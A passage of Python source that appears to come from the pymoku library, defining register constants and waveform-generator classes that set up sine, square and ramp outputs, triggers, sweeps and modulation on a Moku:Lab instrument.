REG_SG_NCycles_TrigDutyCH0_L = 79
REG_SG_NCycles_TrigDutyCH0_H = 80
REG_SG_NCycles_TrigDutyCH1_L = 81
REG_SG_NCycles_TrigDutyCH1_H = 82
REG_SG_TrigSweepMode = 83
REG_SG_SweepLengthCh0_L = 84
REG_SG_SweepLengthCh0_H = 85
REG_SG_SweepLengthCh1_L = 86
REG_SG_SweepLengthCh1_H = 87
REG_SG_SweepInitFreqCh0_L = 88
REG_SG_SweepInitFreqCh0_H = 89
REG_SG_SweepInitFreqCh1_L = 90
REG_SG_SweepInitFreqCh1_H = 91
REG_SG_SweepIncrementCh0_L = 92
REG_SG_SweepIncrementCh0_H = 93
REG_SG_SweepIncrementCh1_L = 94
REG_SG_SweepIncrementCh1_H = 95
REG_SG_WAVEFORMS = 96
REG_SG_MODSOURCE = 123
REG_SG_PRECLIP = 124
REG_SG_FREQ1_L = 97
REG_SG_FREQ1_H = 105
REG_SG_PHASE1 = 98
REG_SG_AMP1 = 99
REG_SG_MODF1_L = 100
REG_SG_MODF1_H = 101
REG_SG_T01 = 102
REG_SG_T11 = 103
REG_SG_T21 = 104
REG_SG_RISERATE1_L = 106
REG_SG_FALLRATE1_L = 107
REG_SG_RFRATE1_H = 108
REG_SG_MODA1 = 121
REG_SG_FREQ2_L = 109
REG_SG_FREQ2_H = 117
REG_SG_PHASE2 = 110
REG_SG_AMP2 = 111
REG_SG_MODF2_L = 112
REG_SG_MODF2_H = 113
REG_SG_T02 = 114
REG_SG_T12 = 115
REG_SG_T22 = 116
REG_SG_RISERATE2_L = 118
REG_SG_FALLRATE2_L = 119
REG_SG_RFRATE2_H = 120
REG_SG_MODA2 = 122
_SG_WAVE_SINE = 0
_SG_WAVE_SQUARE = 1
_SG_WAVE_TRIANGLE = 2
_SG_WAVE_PULSE = 3
_SG_WAVE_DC = 4
_SG_MOD_NONE = 0
_SG_MOD_AMPL = 1
_SG_MOD_FREQ = 2
_SG_MOD_PHASE = 4
_SG_MODSOURCE_INT = 0
_SG_MODSOURCE_ADC = 1
_SG_MODSOURCE_DAC = 2
_SG_FREQSCALE = 1e9 / 2**48
_SG_PHASESCALE = 360.0 / (2**32) # Wraps
_SG_RISESCALE = 1e9 / 2**48
_SG_AMPSCALE = 4.0 / (2**15 - 1)
_SG_DEPTHSCALE = 1.0 / 2**15
_SG_MAX_RISE = 1e9 - 1
_SG_TIMESCALE = 1.0 / (2**32 - 1) # Doesn't wrap
_SG_MOD_FREQ_MAX = 62.5e6 # Hz
_SG_SQUARE_CLIPSINE_THRESH = 25e3 # Hz
_SG_TRIG_EXT = 0
_SG_TRIG_ADC = 1
_SG_TRIG_DAC = 2
_SG_TRIG_INTER = 3
_SG_TRIG_MODE_OFF = 0
_SG_TRIG_MODE_GATE = 1
_SG_TRIG_MODE_START = 2
_SG_TRIG_MODE_NCYCLE= 3
_SG_TRIG_MODE_SWEEP = 4
_SG_TRIGLVL_ADC_MAX = 5.0 # V
_SG_TRIGLVL_ADC_MIN = -5.0 # V
_SG_TRIGLVL_DAC_MAX = 1.0 # V
_SG_TRIGLVL_DAC_MIN = -1.0 # V
class BasicWaveformGenerator(MokuInstrument):
"""
.. automethod:: pymoku.instruments.WaveformGenerator.__init__
"""
def __init__(self):
""" Create a new WaveformGenerator instance, ready to be attached to a Moku."""
super(BasicWaveformGenerator, self).__init__()
self._register_accessors(_siggen_reg_handlers)
self.id = 4
self.type = "signal_generator"
@needs_commit
def set_defaults(self):
super(BasicWaveformGenerator, self).set_defaults()
self.out1_enable = True
self.out2_enable = True
self.out1_amplitude = 0
self.out2_amplitude = 0
self.out1_frequency = 0
self.out2_frequency = 0
self.adc1_statuslight = False
self.adc2_statuslight = False
# Burst/sweep mode exception variables:
self.ch1_is_ramp = False
self.ch2_is_ramp = False
self.ch1_edgetime_nonzero = False
self.ch2_edgetime_nonzero = False
# Disable inputs on hardware that supports it
self.en_in_ch1 = True
self.en_in_ch2 = True
self.trig_sweep_mode_ch1 = _SG_TRIG_MODE_OFF
self.trig_sweep_mode_ch2 = _SG_TRIG_MODE_OFF
# Configure front end:
self._set_frontend(channel = 1, fiftyr=True, atten=True, ac=False)
self._set_frontend(channel = 2, fiftyr=True, atten=True, ac=False)
@needs_commit
def gen_sinewave(self, ch, amplitude, frequency, offset=0, phase=0.0):
""" Generate a Sine Wave with the given parameters on the given channel.
:type ch: int; {1,2}
:param ch: Channel on which to generate the wave
:type amplitude: float, [0.0,2.0] Vpp
:param amplitude: Waveform peak-to-peak amplitude
:type frequency: float, [0,250e6] Hz
:param frequency: Frequency of the wave
:type offset: float, [-1.0,1.0] Volts
:param offset: DC offset applied to the waveform
:type phase: float, [0-360] degrees
:param phase: Phase offset of the wave
:raises ValueError: if the channel number is invalid
:raises ValueOutOfRangeException: if wave parameters are out of range
"""
_utils.check_parameter_valid('set', ch, [1,2],'output channel')
_utils.check_parameter_valid('range', amplitude, [0.0, 2.0],'sinewave amplitude','Volts')
_utils.check_parameter_valid('range', frequency, [0,250e6],'sinewave frequency', 'Hz')
_utils.check_parameter_valid('range', phase, [0,360], 'sinewave phase', 'degrees')
# Ensure offset does not cause signal to exceed allowable 2.0Vpp range
upper_voltage = offset + (amplitude/2.0)
lower_voltage = offset - (amplitude/2.0)
if (upper_voltage > 1.0) or (lower_voltage < -1.0):
raise ValueOutOfRangeException("Sinewave offset limited by amplitude (max output range 2.0Vpp).")
if ch == 1:
            self.ch1_is_ramp = False
self.out1_waveform = _SG_WAVE_SINE
self.out1_enable = True
self.out1_amplitude = amplitude
self.out1_frequency = frequency
self.out1_offset = offset
self.out1_phase = phase
elif ch == 2:
self.ch2_is_ramp = False
self.out2_waveform = _SG_WAVE_SINE
self.out2_enable = True
self.out2_amplitude = amplitude
self.out2_frequency = frequency
self.out2_offset = offset
self.out2_phase = phase
@needs_commit
def gen_squarewave(self, ch, amplitude, frequency, offset=0, duty=0.5, risetime=0, falltime=0, phase=0.0):
""" Generate a Square Wave with given parameters on the given channel.
:type ch: int; {1,2}
:param ch: Channel on which to generate the wave
:type amplitude: float, volts
:param amplitude: Waveform peak-to-peak amplitude
:type frequency: float, hertz
:param frequency: Frequency of the wave
:type offset: float, volts
:param offset: DC offset applied to the waveform
:type duty: float, 0-1
:param duty: Fractional duty cycle
:type risetime: float, 0-1
:param risetime: Fraction of a cycle taken for the waveform to rise
:type falltime: float 0-1
:param falltime: Fraction of a cycle taken for the waveform to fall
:type phase: float, degrees 0-360
:param phase: Phase offset of the wave
:raises ValueError: invalid channel number
:raises ValueOutOfRangeException: input parameters out of range or incompatible with one another
"""
_utils.check_parameter_valid('set', ch, [1,2],'output channel')
_utils.check_parameter_valid('range', amplitude, [0.0, 2.0],'squarewave amplitude','Volts')
_utils.check_parameter_valid('range', frequency, [0,100e6],'squarewave frequency', 'Hz')
        _utils.check_parameter_valid('range', offset, [-1.0,1.0], 'squarewave offset', 'Volts')
_utils.check_parameter_valid('range', duty, [0,1.0], 'squarewave duty', 'cycles')
_utils.check_parameter_valid('range', risetime, [0,1.0], 'squarewave risetime', 'cycles')
_utils.check_parameter_valid('range', falltime, [0,1.0], 'squarewave falltime', 'cycles')
_utils.check_parameter_valid('range', phase, [0,360], 'squarewave phase', 'degrees')
# Ensure offset does not cause signal to exceed allowable 2.0Vpp range
upper_voltage = offset + (amplitude/2.0)
lower_voltage = offset - (amplitude/2.0)
if (upper_voltage > 1.0) or (lower_voltage < -1.0):
raise ValueOutOfRangeException("Squarewave offset limited by amplitude (max output range 2.0Vpp).")
if duty < risetime:
raise ValueOutOfRangeException("Squarewave duty too small for given rise time.")
elif duty + falltime > 1:
raise ValueOutOfRangeException("Squarewave duty and fall time too big.")
# Check rise/fall times are within allowable DAC frequency
# TODO: Implement clipped sine squarewave above threshold
if frequency > _SG_SQUARE_CLIPSINE_THRESH:
log.warning("Squarewave may experience edge jitter above %d kHz.", _SG_SQUARE_CLIPSINE_THRESH/1e3)
riserate = frequency / risetime if risetime else _SG_MAX_RISE
fallrate = frequency / falltime if falltime else _SG_MAX_RISE
# Raise warning if calculated rise/fall rate is > max rise/fall rate. Set values to max if this occurs.
if riserate > _SG_MAX_RISE:
riserate = _SG_MAX_RISE
log.warning("Riserate restricted to maximum value of %d s.",_SG_MAX_RISE)
if fallrate > _SG_MAX_RISE:
fallrate = _SG_MAX_RISE
log.warning("Fallrate restricted to maximum value of %d s.",_SG_MAX_RISE)
if ch == 1:
self.out1_waveform = _SG_WAVE_SQUARE
self.out1_enable = True
self.out1_amplitude = amplitude
self.out1_frequency = frequency
self.out1_offset = offset
self.out1_clipsine = False # TODO: Should switch to clip depending on freq or user
# This is overdefined, but saves the FPGA doing a tricky division
self.out1_t0 = risetime
self.out1_t1 = duty
self.out1_t2 = duty + falltime
self.out1_riserate = riserate
self.out1_fallrate = fallrate
self.out1_phase = phase
# Parameters used to determine burst/sweep mode exception cases:
            self.ch1_edgetime_nonzero = (risetime != 0 or falltime != 0)
            self.ch1_is_ramp = False
elif ch == 2:
self.out2_waveform = _SG_WAVE_SQUARE
self.out2_enable = True
self.out2_amplitude = amplitude
self.out2_frequency = frequency
self.out2_offset = offset
self.out2_clipsine = False
self.out2_t0 = risetime
self.out2_t1 = duty
self.out2_t2 = duty + falltime
self.out2_riserate = frequency / risetime if risetime else _SG_MAX_RISE
self.out2_fallrate = frequency / falltime if falltime else _SG_MAX_RISE
self.out2_phase = phase
            self.ch2_edgetime_nonzero = (risetime != 0 or falltime != 0)
self.ch2_is_ramp = False
@needs_commit
def gen_rampwave(self, ch, amplitude, frequency, offset=0, symmetry=0.5, phase= 0.0):
""" Generate a Ramp with the given parameters on the given channel.
This is a wrapper around the Square Wave generator, using the *riserate* and *fallrate*
parameters to form the ramp.
:type ch: int; {1,2}
:param ch: Channel on which to generate the wave
:type amplitude: float, volts
:param amplitude: Waveform peak-to-peak amplitude
:type frequency: float, hertz
:param frequency: Frequency of the wave
:type offset: float, volts
:param offset: DC offset applied to the waveform
:type symmetry: float, 0-1
:param symmetry: Fraction of the cycle rising.
:type phase: float, degrees 0-360
:param phase: Phase offset of the wave
:raises ValueError: invalid channel number
:raises ValueOutOfRangeException: invalid waveform parameters
"""
_utils.check_parameter_valid('set', ch, [1,2],'output channel')
_utils.check_parameter_valid('range', amplitude, [0.0, 2.0],'rampwave amplitude','Volts')
_utils.check_parameter_valid('range', frequency, [0,100e6],'rampwave frequency', 'Hz')
        _utils.check_parameter_valid('range', offset, [-1.0,1.0], 'rampwave offset', 'Volts')
_utils.check_parameter_valid('range', symmetry, [0,1.0], 'rampwave symmetry', 'fraction')
_utils.check_parameter_valid('range', phase, [0,360], 'rampwave phase', 'degrees')
# Ensure offset does not cause signal to exceed allowable 2.0Vpp range
upper_voltage = offset + (amplitude/2.0)
lower_voltage = offset - (amplitude/2.0)
if (upper_voltage > 1.0) or (lower_voltage < -1.0):
raise ValueOutOfRangeException("Rampwave offset limited by amplitude (max output range 2.0Vpp).")
self.gen_squarewave(ch, amplitude, frequency,
offset = offset, duty = symmetry,
risetime = symmetry,
falltime = 1 - symmetry,
phase = phase)
# Ramp waveforms not allowed for burst/sweep modes
if ch == 1:
self.ch1_is_ramp = True
else:
self.ch2_is_ramp = True
@needs_commit
def gen_off(self, ch=None):
""" Turn Waveform Generator output(s) off.
The channel will be turned on when configuring the waveform type but can be turned off
using this function. If *ch* is None (the default), both channels will be turned off,
otherwise just the one specified by the argument.
:type ch: int; {1,2} or None
:param ch: Channel to turn off, or both.
:raises ValueError: invalid channel number
:raises ValueOutOfRangeException: if the channel number is invalid
"""
_utils.check_parameter_valid('set', ch, [1,2],'output channel', allow_none=True)
if ch is None or ch == 1:
self.out1_enable = False
if ch is None or ch == 2:
self.out2_enable = False
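# Usage sketch (illustrative; per the class docstring below, an instrument is
# normally obtained through a connected Moku object `m`, which is assumed
# here and not constructed in this module):
#
#     gen = m.deploy_instrument(WaveformGenerator)
#     gen.gen_sinewave(1, amplitude=1.0, frequency=1e6)
#     gen.gen_squarewave(2, amplitude=0.5, frequency=1e3, duty=0.25)
#     gen.gen_off()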
class WaveformGenerator(BasicWaveformGenerator):
""" Waveform Generator instrument object.
To run a new Waveform Generator instrument, this should be instantiated and deployed via a connected
:any:`Moku` object using :any:`deploy_instrument`. Alternatively, a pre-configured instrument object
can be obtained by discovering an already running Waveform Generator instrument on a Moku:Lab device via
:any:`discover_instrument`.
.. automethod:: pymoku.instruments.WaveformGenerator.__init__
.. attribute:: type
:annotation: = "signal_generator"
Name of this instrument.
"""
def __init__(self):
""" Create a new WaveformGenerator instance, ready to be attached to a Moku."""
super(WaveformGenerator, self).__init__()
self._register_accessors(_siggen_mod_reg_handlers)
# Define any (non-register-mapped) properties that are used when committing
# as a commit is called when the instrument is set running
self.trig_volts_ch1 = 0.0
self.trig_volts_ch2 = 0.0
@needs_commit
def set_trigger(self, ch, mode, ncycles=1, sweep_start_freq=None, sweep_end_freq=0, sweep_duration=0, trigger_source='external', trigger_threshold=0.0, internal_trig_period=1.0, internal_trig_high=0.5):
""" Configure gated, start, ncycle or sweep trigger mode on target channel.
The trigger event can come from an ADC input channel, the opposite generated waveform, the external
trigger input (for hardware that supports that) or a internally-generated clock of configurable
period.
The trigger event can be used in several different ways:
- *gated*: The output waveform is only generated while the trigger is asserted
- *start*: The output waveform is enabled once the trigger event fires
- *ncycle*: The output waveform starts at a trigger event and completes the given number of cycles, before turning off and re-arming
- *sweep*: The trigger event starts the waveform generation at the *sweep_start_freq*, before automatically sweeping the
frequency to *sweep_end_freq* over the course of *sweep_duration* seconds.
:type ch : int
:param ch: target channel.
        :type mode: string, {'gated', 'start', 'ncycle', 'sweep'}
:param mode: Select the mode in which the trigger is operated.
:type ncycles : int, [1, 1e6]
:param ncycles : integer number of signal repetitions in ncycle mode.
:type sweep_start_freq : float, [0.0,250.0e6], hertz
:param sweep_start_freq : starting sweep frequency, set to current waveform frequency if not specified. Value range may vary for different waveforms.
:type sweep_end_freq : float, [0.0,250.0e6], hertz
:param sweep_end_freq : finishing sweep frequency. Value range may vary for different waveforms.
:type sweep_duration : float, [0.0,1000.0], seconds
:param sweep_duration : sweep duration in seconds.
:type trigger_source: string {'external', 'in', 'out', 'internal'}
        :param trigger_source: defines which source should be used as the triggering signal.
:type trigger_threshold: float, [-5, 5], volts
        :param trigger_threshold: The threshold value range depends on the source and the attenuation used. Valid ranges may be narrower for some settings.
        :type internal_trig_period: float, [100.0e-9, 1000.0], seconds
        :param internal_trig_period: period of the internal trigger clock, if used.
        :type internal_trig_high: float, [10.0e-9, 1000.0], seconds
        :param internal_trig_high: High time of the internal trigger clock, if used. Must be less than the internal trigger period.
"""
_utils.check_parameter_valid('set', ch, [1,2],'output channel')
_utils.check_parameter_valid('set', mode, ['gated','start','ncycle','sweep'],'trigger mode')
_utils.check_parameter_valid('set', trigger_source, ['external','in', 'out','adc','dac','internal'],'trigger source')
        _utils.check_parameter_valid('range', ncycles, [0,1e6],'ncycles','cycles')
_utils.check_parameter_valid('range', sweep_duration, [0.0,1000.0],'sweep duration','seconds')
_utils.check_parameter_valid('range', internal_trig_period, [100.0e-9,1000.0],'internal trigger period','seconds')
_utils.check_parameter_valid('range', internal_trig_high, [10.0e-9,1000.0],'internal trigger high time','seconds')
# Can't use modulation with trigger/sweep modes
self.gen_modulate_off(ch)
## Configure trigger source settings:
_str_to_trigger_source = {
'external' : _SG_TRIG_EXT,
'adc' : _SG_TRIG_ADC,
'in': _SG_TRIG_ADC,
'out': _SG_TRIG_DAC,
'dac' : _SG_TRIG_DAC,
'internal' : _SG_TRIG_INTER
}
source = _utils.str_to_val(_str_to_trigger_source, trigger_source, 'trigger source')
if source is _SG_TRIG_ADC:
_utils.check_parameter_valid('range', trigger_threshold, [_SG_TRIGLVL_ADC_MIN, _SG_TRIGLVL_ADC_MAX], 'trigger threshold', 'Volts')
elif source is _SG_TRIG_DAC:
_utils.check_parameter_valid('range', trigger_threshold, [_SG_TRIGLVL_DAC_MIN, _SG_TRIGLVL_DAC_MAX], 'trigger threshold', 'Volts')
## The internal trigger's duty cycle is only used in gated burst mode. Duty cycle is limited such that the duty period is not
## less than 8 ns and not greater than the trigger period minus 8 ns.
if internal_trig_high > internal_trig_period:
raise ValueOutOfRangeException("Internal trigger high must be less than or equal to the internal trigger period.")
if (internal_trig_period - internal_trig_high) <= 8.0e-9:
internal_trig_high = internal_trig_period - 10.0e-9
internal_trig_increment = math.ceil((2**64-1)/float((internal_trig_period*125*10**6)))
internal_trig_dutytarget = round((2**64-1)*(float(internal_trig_high)/float(internal_trig_period))) if mode == 'gated' else 2**63
if ch == 1:
self.trigger_select_ch1 = source
if source == _SG_TRIG_INTER:
self.internal_trig_increment_ch1 = internal_trig_increment
self.internal_trig_dutytarget_ch1 = internal_trig_dutytarget
self.adc1_statuslight = True if source == _SG_TRIG_ADC else False
elif ch == 2:
self.trigger_select_ch2 = source
if source == _SG_TRIG_INTER:
self.internal_trig_increment_ch2 = internal_trig_increment
self.internal_trig_dutytarget_ch2 = internal_trig_dutytarget
self.adc2_statuslight = True if source == _SG_TRIG_ADC else False
# Configure trigger mode settings and evaluate exception conditions:
if sweep_start_freq is None:
channel_frequency = self.out1_frequency if ch == 1 else self.out2_frequency
else:
channel_frequency = sweep_start_freq
        # Check the waveform parameter; valid frequency ranges are wider for sine waves
        waveform = self.out1_waveform if ch == 1 else self.out2_waveform
if waveform == _SG_WAVE_SINE:
_utils.check_parameter_valid('range', sweep_end_freq, [0.0,250.0e6],'sweep finishing frequency','frequency')
_utils.check_parameter_valid('range', channel_frequency, [0.0,250.0e6],'sweep starting frequency','frequency')
else:
_utils.check_parameter_valid('range', sweep_end_freq, [0.0,100.0e6],'sweep finishing frequency','frequency')
_utils.check_parameter_valid('range', channel_frequency, [0.0,100.0e6],'sweep starting frequency','frequency')
# Ramp waveform cannot be used for any burst/sweep mode:
is_ramp = self.ch1_is_ramp if ch == 1 else self.ch2_is_ramp
        if is_ramp:
raise ValueOutOfRangeException("Ramp waveforms cannot be used in burst/sweep modes.")
_str_to_trigger_mode = {
'gated' : _SG_TRIG_MODE_GATE,
'start' : _SG_TRIG_MODE_START,
'ncycle' : _SG_TRIG_MODE_NCYCLE,
'sweep' : _SG_TRIG_MODE_SWEEP
}
mode = _utils.str_to_val(_str_to_trigger_mode, mode, 'trigger mode')
# Pulse waveform edge must be minimum for gated burst mode and sweep mode:
        if (mode is _SG_TRIG_MODE_GATE or mode is _SG_TRIG_MODE_SWEEP) and waveform != _SG_WAVE_SINE:
            if ch == 1 and self.ch1_edgetime_nonzero:
                raise ValueOutOfRangeException("Pulse waveform rise and fall times must be set to zero for gated burst mode and sweep mode.")
            if ch == 2 and self.ch2_edgetime_nonzero:
                raise ValueOutOfRangeException("Pulse waveform rise and fall times must be set to zero for gated burst mode and sweep mode.")
# Waveform frequencies are restricted to <= 10 MHz in Ncycle burst mode:
if mode is _SG_TRIG_MODE_NCYCLE and channel_frequency > 10.0e6:
raise ValueOutOfRangeException("Waveform frequencies are restricted to 10 MHz or less in Ncycle burst mode.")
# Internal trigger source cannot be used for burst start mode:
trigger_source = self.trigger_select_ch1 if ch == 1 else self.trigger_select_ch2
        if mode is _SG_TRIG_MODE_START and trigger_source == _SG_TRIG_INTER:
raise ValueOutOfRangeException("The internal trigger source cannot be used in start burst mode.")
# ensure combination of signal frequency and Ncycles doesn't cause 64 bit register overflow:
if mode is _SG_TRIG_MODE_NCYCLE:
signal_period = 0 if channel_frequency == 0.0 else channel_frequency**-1
FPGA_cycles = math.ceil(125e6 * signal_period * ncycles)
if FPGA_cycles > 2**63-1:
raise ValueOutOfRangeException("NCycle Register Overflow")
if mode is _SG_TRIG_MODE_SWEEP:
phase_increment = math.ceil((float(2**31 * 2**48) / float(125*10**15)) * float(sweep_end_freq - channel_frequency)/float(sweep_duration))
sweep_length_FPGA_cycles = math.ceil(125e6 * sweep_duration)
init_freq = channel_frequency * math.ceil(float(2**48)/float(10**9))
if ch == 1:
self.trig_volts_ch1 = trigger_threshold
self.trig_sweep_mode_ch1 = mode
if mode is _SG_TRIG_MODE_NCYCLE:
self.ncycles_period_ch1 = FPGA_cycles
if mode is _SG_TRIG_MODE_SWEEP:
self.sweep_length_ch1 = sweep_length_FPGA_cycles
self.sweep_init_freq_ch1 = init_freq
self.sweep_increment_ch1 = phase_increment
elif ch == 2:
self.trig_volts_ch2 = trigger_threshold
self.trig_sweep_mode_ch2 = mode
if mode is _SG_TRIG_MODE_NCYCLE:
self.ncycles_period_ch2 = FPGA_cycles
if mode is _SG_TRIG_MODE_SWEEP:
self.sweep_length_ch2 = sweep_length_FPGA_cycles
self.sweep_init_freq_ch2 = init_freq
self.sweep_increment_ch2 = phase_increment
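    # Examples (illustrative): ten cycles of the channel-1 waveform per edge
    # on the external trigger input:
    #
    #     gen.set_trigger(1, 'ncycle', ncycles=10, trigger_source='external')
    #
    # or a 1 s sweep from 1 kHz to 1 MHz driven by the internal clock:
    #
    #     gen.set_trigger(1, 'sweep', sweep_start_freq=1e3, sweep_end_freq=1e6,
    #                     sweep_duration=1.0, trigger_source='internal')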
def _update_dependent_regs(self):
# Trigger level must be scaled depending on the current relay settings and chosen trigger source
g1, g2 = self._adc_gains()
d1, d2 = self._dac_gains()
if self.trigger_select_ch1 == _SG_TRIG_ADC:
try:
self.trig_ADC_threshold_ch1 = self.trig_volts_ch1 / g1
except ValueOutOfRangeException:
raise ValueOutOfRangeException("Invalid Trigger threshold on channel 1. Valid range for input is [-0.5, 0.5] and if attenution is on [-5, 5].")
if self.trigger_select_ch2 == _SG_TRIG_ADC:
try:
self.trig_ADC_threshold_ch2 = self.trig_volts_ch2 / g2
except ValueOutOfRangeException:
raise ValueOutOfRangeException("Invalid Trigger threshold on channel 2. Valid range for input is [-0.5, 0.5] and if attenution is on [-5, 5].")
if self.trigger_select_ch1 == _SG_TRIG_DAC:
try:
self.trig_DAC_threshold_ch2 = self.trig_volts_ch1 / d2
except ValueOutOfRangeException:
raise ValueOutOfRangeException("Invalid Trigger threshold on channel 1. Valid range for output is [-1, 1].")
if self.trigger_select_ch2 == _SG_TRIG_DAC:
try:
self.trig_DAC_threshold_ch1 = self.trig_volts_ch2 / d1
except ValueOutOfRangeException:
raise ValueOutOfRangeException("Invalid Trigger threshold on channel 2. Valid range for output is [-1, 1] .")
@needs_commit
def gen_trigger_off(self, ch=None):
"""
Turn off trigger/sweep mode for the specified output channel.
If *ch* is None (the default), both channels will be turned off,
otherwise just the one specified by the argument.
:type ch: int; {1,2} or None
:param ch: Output channel to turn trigger/sweep mode off
"""
_utils.check_parameter_valid('set', ch, [1,2],'output channel', allow_none=True)
if ch==1:
self.trig_sweep_mode_ch1 = 0
elif ch==2:
self.trig_sweep_mode_ch2 = 0
else:
self.trig_sweep_mode_ch1 = 0
self.trig_sweep_mode_ch2 = 0
@needs_commit
def gen_modulate_off(self, ch=None):
"""
Turn off modulation for the specified output channel.
If *ch* is None (the default), both channels will be turned off,
otherwise just the one specified by the argument.
:type ch: int; {1,2} or None
:param ch: Output channel to turn modulation off.
"""
# Disable modulation by clearing modulation type bits
_utils.check_parameter_valid('set', ch, [1,2],'output channel', allow_none=True)
if ch==1:
self.out1_modulation = 0
if ch==2:
self.out2_modulation = 0
@needs_commit
def gen_modulate(self, ch, mtype, source, depth, frequency=0.0):
"""
Set up modulation on an output channel.
:type ch: int; {1,2}
:param ch: Channel to modulate
:type mtype: string, {amplitude', 'frequency', 'phase'}
:param mtype: Modulation type. Respectively Off, Amplitude, Frequency and Phase modulation.
:type source: string, {'internal', 'in', 'out'}
:param source: Modulation source. Respectively Internal Sinewave, associated input channel or opposite output channel.
:type depth: float 0-1, 0-125MHz or 0 - 360 deg
:param depth: Modulation depth (depends on modulation type): Fractional modulation depth, Frequency Deviation/Volt or Phase shift
:type frequency: float
:param frequency: Frequency of internally-generated sine wave modulation. This parameter is ignored if the source is set to ADC or DAC.
:raises ValueOutOfRangeException: if the channel number is invalid or modulation parameters can't be achieved
"""
_utils.check_parameter_valid('set', ch, [1,2],'output modulation channel')
_utils.check_parameter_valid('range', frequency, [0,250e6],'internal modulation frequency')
# Can't use trigger/sweep modes at the same time as modulation
self.gen_trigger_off(ch)
_str_to_modsource = {
'internal' : _SG_MODSOURCE_INT,
'in' : _SG_MODSOURCE_ADC,
'out' : _SG_MODSOURCE_DAC
}
_str_to_modtype = {
'amplitude' : _SG_MOD_AMPL,
'frequency' : _SG_MOD_FREQ,
'phase' : _SG_MOD_PHASE
}
source = _utils.str_to_val(_str_to_modsource, source, 'modulation source')
        mtype = _utils.str_to_val(_str_to_modtype, mtype, 'modulation type')
# Calculate the depth value depending on modulation source and type
depth_parameter = 0.0
if mtype == _SG_MOD_AMPL:
_utils.check_parameter_valid('range', depth, [0.0,1.0], 'amplitude modulation depth', 'fraction')
depth_parameter = depth
elif mtype == _SG_MOD_FREQ:
_utils.check_parameter_valid('range', depth, [0.0,_SG_MOD_FREQ_MAX], 'frequency modulation depth', 'Hz/V')
depth_parameter = depth/(DAC_SMP_RATE/8.0)
elif mtype == _SG_MOD_PHASE:
_utils.check_parameter_valid('range', depth, [0.0, 360.0], 'phase modulation depth', 'degrees/V')
depth_parameter = depth/360.0
# Get the calibration coefficients of the front end and output
dac1, dac2 = self._dac_gains()
adc1, adc2 = self._adc_gains()
if ch == 1:
self.out1_modulation = mtype
self.out1_modsource = source
self.mod1_frequency = frequency
self.adc1_statuslight = True if source == _SG_MODSOURCE_ADC else False
elif ch == 2:
self.out2_modulation = mtype
self.out2_modsource = source
self.mod2_frequency = frequency
self.adc2_statuslight = True if source == _SG_MODSOURCE_ADC else False
# Calibrate the depth value depending on the source
if(source == _SG_MODSOURCE_INT):
depth_parameter *= 1.0 # No change in depth
elif(source == _SG_MODSOURCE_DAC):
# Opposite DAC is used
depth_parameter = depth_parameter * pow(2.0,15.0) * (dac2 if ch == 1 else dac1)
elif(source == _SG_MODSOURCE_ADC):
# Associated ADC for current channel
depth_parameter = depth_parameter * pow(2.0,9.0) * (adc1 if ch == 1 else adc2)
if ch == 1:
self.mod1_amplitude = (pow(2.0, 32.0) - 1) * depth_parameter / 4.0
elif ch == 2:
self.mod2_amplitude = (pow(2.0, 32.0) - 1) * depth_parameter / 4.0
def commit(self):
self._update_dependent_regs()
# Commit the register values to the device
super(WaveformGenerator, self).commit()
# Bring in the docstring from the superclass for our docco.
commit.__doc__ = MokuInstrument.commit.__doc__
_siggen_mod_reg_handlers = {
'out1_modulation': (REG_SG_WAVEFORMS, to_reg_unsigned(16, 8, allow_range=[_SG_MOD_NONE, _SG_MOD_AMPL | _SG_MOD_FREQ | _SG_MOD_PHASE]),
from_reg_unsigned(16, 8)),
'out2_modulation': (REG_SG_WAVEFORMS, to_reg_unsigned(24, 8, allow_range=[_SG_MOD_NONE, _SG_MOD_AMPL | _SG_MOD_FREQ | _SG_MOD_PHASE]),
from_reg_unsigned(24, 8)),
'mod1_frequency': ((REG_SG_MODF1_H, REG_SG_MODF1_L),
lambda obj, f, old: ((old[0] & 0x0000FFFF) | (_usgn(f/_SG_FREQSCALE, 48) >> 16) & 0xFFFF0000, _usgn(f/_SG_FREQSCALE, 48) & 0xFFFFFFFF),
lambda obj, rval: _SG_FREQSCALE * ((rval[0] & 0xFFFF0000) << 16 | rval[1])),
'mod2_frequency': ((REG_SG_MODF2_H, REG_SG_MODF2_L),
lambda obj, f, old: ((old[0] & 0x0000FFFF) | (_usgn(f/_SG_FREQSCALE, 48) >> 16) & 0xFFFF0000, _usgn(f/_SG_FREQSCALE, 48) & 0xFFFFFFFF),
lambda obj, rval: _SG_FREQSCALE * ((rval[0] & 0xFFFF0000) << 16 | rval[1])),
# The meaning of this amplitude field is complicated enough that the conversion to register value is done in the
# main code above rather than inline
'mod1_amplitude': (REG_SG_MODA1, to_reg_unsigned(0, 32),
from_reg_unsigned(0, 32)),
'mod2_amplitude': (REG_SG_MODA2, to_reg_unsigned(0, 32),
from_reg_unsigned(0, 32)),
'out1_modsource': (REG_SG_MODSOURCE, to_reg_unsigned(1, 2, allow_set=[_SG_MODSOURCE_INT, _SG_MODSOURCE_ADC, _SG_MODSOURCE_DAC]),
from_reg_unsigned(1, 2)),
'out2_modsource': (REG_SG_MODSOURCE, to_reg_unsigned(3, 2, allow_set=[_SG_MODSOURCE_INT, _SG_MODSOURCE_ADC, _SG_MODSOURCE_DAC]),
from_reg_unsigned(3, 2))
}
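# Note on the paired-register fields above (explanatory comment, added for
# clarity): 48-bit values such as the modulation frequency are split across
# two 32-bit registers. The low register carries value bits [31:0]; the upper
# 16 bits of the high register carry value bits [47:32]; and the high
# register's lower 16 bits belong to a neighbouring field, which is why the
# pack lambda preserves them with `old[0] & 0x0000FFFF`.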
_siggen_reg_handlers = {
'out1_enable': (REG_SG_WAVEFORMS, to_reg_bool(0), from_reg_bool(0)),
'out2_enable': (REG_SG_WAVEFORMS, to_reg_bool(1), from_reg_bool(1)),
'out1_waveform': (REG_SG_WAVEFORMS, to_reg_unsigned(4, 3, allow_set=[_SG_WAVE_SINE, _SG_WAVE_SQUARE, _SG_WAVE_TRIANGLE, _SG_WAVE_DC, _SG_WAVE_PULSE]),
from_reg_unsigned(4, 3)),
'out2_waveform': (REG_SG_WAVEFORMS, to_reg_unsigned(8, 3, allow_set=[_SG_WAVE_SINE, _SG_WAVE_SQUARE, _SG_WAVE_TRIANGLE, _SG_WAVE_DC, _SG_WAVE_PULSE]),
from_reg_unsigned(8, 3)),
'out1_clipsine': (REG_SG_WAVEFORMS, to_reg_bool(7), from_reg_bool(7)),
'out2_clipsine': (REG_SG_WAVEFORMS, to_reg_bool(11), from_reg_bool(11)),
